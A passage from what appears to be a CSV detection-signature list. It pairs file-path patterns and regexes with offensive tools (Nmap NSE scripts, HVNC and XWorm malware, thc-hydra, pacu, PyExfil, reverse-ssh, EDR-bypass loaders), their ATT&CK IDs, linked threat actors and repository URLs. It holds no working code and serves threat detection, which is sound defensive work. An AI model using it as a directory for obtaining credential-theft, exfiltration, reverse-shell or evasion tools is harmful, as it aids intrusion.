"*/http-vuln-cve2013-6786.nse*",".{0,1000}\/http\-vuln\-cve2013\-6786\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7958"
"*/http-vuln-cve2013-7091.nse*",".{0,1000}\/http\-vuln\-cve2013\-7091\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7959"
"*/http-vuln-cve2014-2126.nse*",".{0,1000}\/http\-vuln\-cve2014\-2126\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7960"
"*/http-vuln-cve2014-2127.nse*",".{0,1000}\/http\-vuln\-cve2014\-2127\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7961"
"*/http-vuln-cve2014-2128.nse*",".{0,1000}\/http\-vuln\-cve2014\-2128\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7962"
"*/http-vuln-cve2014-2129.nse*",".{0,1000}\/http\-vuln\-cve2014\-2129\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7963"
"*/http-vuln-cve2014-3704.nse*",".{0,1000}\/http\-vuln\-cve2014\-3704\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7964"
"*/http-vuln-cve2014-8877.nse*",".{0,1000}\/http\-vuln\-cve2014\-8877\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7965"
"*/http-vuln-cve2015-1427.nse*",".{0,1000}\/http\-vuln\-cve2015\-1427\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7966"
"*/http-vuln-cve2015-1635.nse*",".{0,1000}\/http\-vuln\-cve2015\-1635\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7967"
"*/http-vuln-cve2017-1001000.nse*",".{0,1000}\/http\-vuln\-cve2017\-1001000\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7968"
"*/http-vuln-cve2017-5638.nse*",".{0,1000}\/http\-vuln\-cve2017\-5638\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7969"
"*/http-vuln-cve2017-5689.nse*",".{0,1000}\/http\-vuln\-cve2017\-5689\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7970"
"*/http-vuln-cve2017-8917.nse*",".{0,1000}\/http\-vuln\-cve2017\-8917\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7971"
"*/http-vulners-regex.nse*",".{0,1000}\/http\-vulners\-regex\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://github.com/vulnersCom/nmap-vulners","1","1","N/A","N/A","N/A","10","3297","553","2024-04-03T11:53:29Z","2017-12-19T21:21:28Z","7972"
"*/http-vuln-misfortune-cookie.nse*",".{0,1000}\/http\-vuln\-misfortune\-cookie\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7973"
"*/http-vuln-wnr1000-creds.nse*",".{0,1000}\/http\-vuln\-wnr1000\-creds\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7974"
"*/http-waf-detect.nse*",".{0,1000}\/http\-waf\-detect\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7975"
"*/http-waf-fingerprint.nse*",".{0,1000}\/http\-waf\-fingerprint\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7976"
"*/http-webdav-scan.nse*",".{0,1000}\/http\-webdav\-scan\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7977"
"*/http-wordpress-brute.nse*",".{0,1000}\/http\-wordpress\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7978"
"*/http-wordpress-enum.nse*",".{0,1000}\/http\-wordpress\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7979"
"*/http-wordpress-users.nse*",".{0,1000}\/http\-wordpress\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7980"
"*/http-xssed.nse*",".{0,1000}\/http\-xssed\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7981"
"*/huan.exe *",".{0,1000}\/huan\.exe\s.{0,1000}","offensive_tool_keyword","Huan","Huan is an encrypted PE Loader Generator that I developed for learning PE file structure and PE loading processes. It encrypts the PE file to be run with different keys each time and embeds it in a new section of the loader binary. Currently. it works on 64 bit PE files.","T1027 - T1036 - T1564 - T1003 - T1056 - T1204 - T1588 - T1620","TA0002 - TA0008 - ","N/A","N/A","Exploitation tool","https://github.com/frkngksl/Huan","1","0","N/A","N/A","N/A","6","540","107","2021-08-13T10:48:26Z","2021-05-21T08:55:02Z","7982"
"*/HuanLoader/*",".{0,1000}\/HuanLoader\/.{0,1000}","offensive_tool_keyword","Huan","Huan is an encrypted PE Loader Generator that I developed for learning PE file structure and PE loading processes. It encrypts the PE file to be run with different keys each time and embeds it in a new section of the loader binary. Currently. it works on 64 bit PE files.","T1027 - T1036 - T1564 - T1003 - T1056 - T1204 - T1588 - T1620","TA0002 - TA0008 - ","N/A","N/A","Exploitation tool","https://github.com/frkngksl/Huan","1","1","N/A","N/A","N/A","6","540","107","2021-08-13T10:48:26Z","2021-05-21T08:55:02Z","7983"
"*/HVNC.git*",".{0,1000}\/HVNC\.git.{0,1000}","offensive_tool_keyword","HVNC","Standalone HVNC Client & Server Coded in C++ (Modified Tinynuke)","T1021.005 - T1071 - T1563.002 - T1219","TA0001 - TA0002 - TA0008","N/A","N/A","RMM","https://github.com/Meltedd/HVNC","1","1","N/A","N/A","10","5","445","133","2025-03-27T21:20:10Z","2021-09-03T17:34:44Z","7984"
"*/hvnc/ngrok.zip*",".{0,1000}\/hvnc\/ngrok\.zip.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","1","N/A","N/A","10","7","N/A","N/A","N/A","N/A","7985"
"*/HVNC-Server.exe*",".{0,1000}\/HVNC\-Server\.exe.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","N/A","10","","N/A","","","","7986"
"*/HWSyscalls.cpp*",".{0,1000}\/HWSyscalls\.cpp.{0,1000}","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tool","https://github.com/florylsk/NtRemoteLoad","1","1","N/A","N/A","10","3","213","37","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z","7987"
"*/hXOR.exe*",".{0,1000}\/hXOR\.exe.{0,1000}","offensive_tool_keyword","hXOR-Packer","hXOR Packer is a PE (Portable Executable) packer with Huffman Compression and Xor encryption.","T1027 - T1048.003 - T1140 - T1205.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/akuafif/hXOR-Packer","1","1","N/A","N/A","9","1","57","14","2021-09-11T13:00:34Z","2020-11-19T14:57:03Z","7988"
"*/hXOR-Packer.git*",".{0,1000}\/hXOR\-Packer\.git.{0,1000}","offensive_tool_keyword","hXOR-Packer","hXOR Packer is a PE (Portable Executable) packer with Huffman Compression and Xor encryption.","T1027 - T1048.003 - T1140 - T1205.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/akuafif/hXOR-Packer","1","1","N/A","N/A","9","1","57","14","2021-09-11T13:00:34Z","2020-11-19T14:57:03Z","7989"
"*/hydra -*",".{0,1000}hydra\s\-.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","ALLANITE - BERSERK BEAR","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","#linux","N/A","N/A","10","10326","2137","2025-04-04T12:19:05Z","2014-04-24T14:45:37Z","7990"
"*/hyperion.exe*",".{0,1000}\/hyperion\.exe.{0,1000}","offensive_tool_keyword","hyperion","A runtime PE-Crypter - The crypter is started via the command line and encrypts an input executable with AES-128. The encrypted file decrypts itself on startup (bruteforcing the AES key which may take a few seconds)","T1027.002 - T1059.001 - T1116","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://www.kali.org/tools/hyperion/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","7991"
"*/Hypnos.git*",".{0,1000}\/Hypnos\.git.{0,1000}","offensive_tool_keyword","Hypnos","indirect syscalls - the Win API functions are not hooked by AV/EDR - bypass EDR detections","T1055.012 - T1136.001 - T1070.004 - T1055.001","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/CaptainNox/Hypnos","1","1","N/A","N/A","10","1","49","6","2024-02-12T17:51:24Z","2023-07-11T09:07:10Z","7995"
"*/hypobrychium.git*",".{0,1000}\/hypobrychium\.git.{0,1000}","offensive_tool_keyword","hypobrychium","hypobrychium AV/EDR Bypass","T1562.001 - T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/foxlox/hypobrychium","1","1","N/A","N/A","8","1","72","21","2023-07-21T21:13:20Z","2023-07-18T09:55:07Z","7996"
"*/iam__backdoor_users_password*",".{0,1000}\/iam__backdoor_users_password.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","7997"
"*/iam__bruteforce_permissions/*",".{0,1000}\/iam__bruteforce_permissions\/.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","7998"
"*/iam__privesc_scan*",".{0,1000}\/iam__privesc_scan.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","#linux","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","7999"
"*/iamassumeroleenum.py*",".{0,1000}\/iamassumeroleenum\.py.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","1","N/A","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","8000"
"*/iat_obfuscation.exe*",".{0,1000}\/iat_obfuscation\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","8001"
"*/iax2-brute.nse*",".{0,1000}\/iax2\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8002"
"*/iax2-version.nse*",".{0,1000}\/iax2\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8003"
"*/icap-info.nse*",".{0,1000}\/icap\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8004"
"*/icebreaker.git*",".{0,1000}\/icebreaker\.git.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","1","N/A","N/A","10","10","1190","163","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z","8005"
"*/icebreaker.py*",".{0,1000}\/icebreaker\.py.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","1","N/A","N/A","10","10","1190","163","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z","8006"
"*/IceRat v 1.0.exe*",".{0,1000}\/IceRat\sv\s1\.0\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","8007"
"*/icmp_exfiltration.py*",".{0,1000}\/icmp_exfiltration\.py.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","#linux","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","8008"
"*/id_reverse-ssh.pub*",".{0,1000}\/id_reverse\-ssh\.pub.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","1","N/A","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","8009"
"*/IdentifyDomainAdmins.ahk*",".{0,1000}\/IdentifyDomainAdmins\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","1","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","8010"
"*/IdentifyGroupMembershipActiveUser.ahk*",".{0,1000}\/IdentifyGroupMembershipActiveUser\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","1","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","8011"
"*/IDiagnosticProfileUAC*",".{0,1000}\/IDiagnosticProfileUAC.{0,1000}","offensive_tool_keyword","IDiagnosticProfileUAC","UAC bypass using auto-elevated COM object Virtual Factory for DiagCpl","T1548.002 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/Wh04m1001/IDiagnosticProfileUAC","1","1","N/A","N/A","10","2","182","32","2022-07-02T20:31:47Z","2022-07-02T19:55:42Z","8012"
"*/iec-identify.nse*",".{0,1000}\/iec\-identify\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8013"
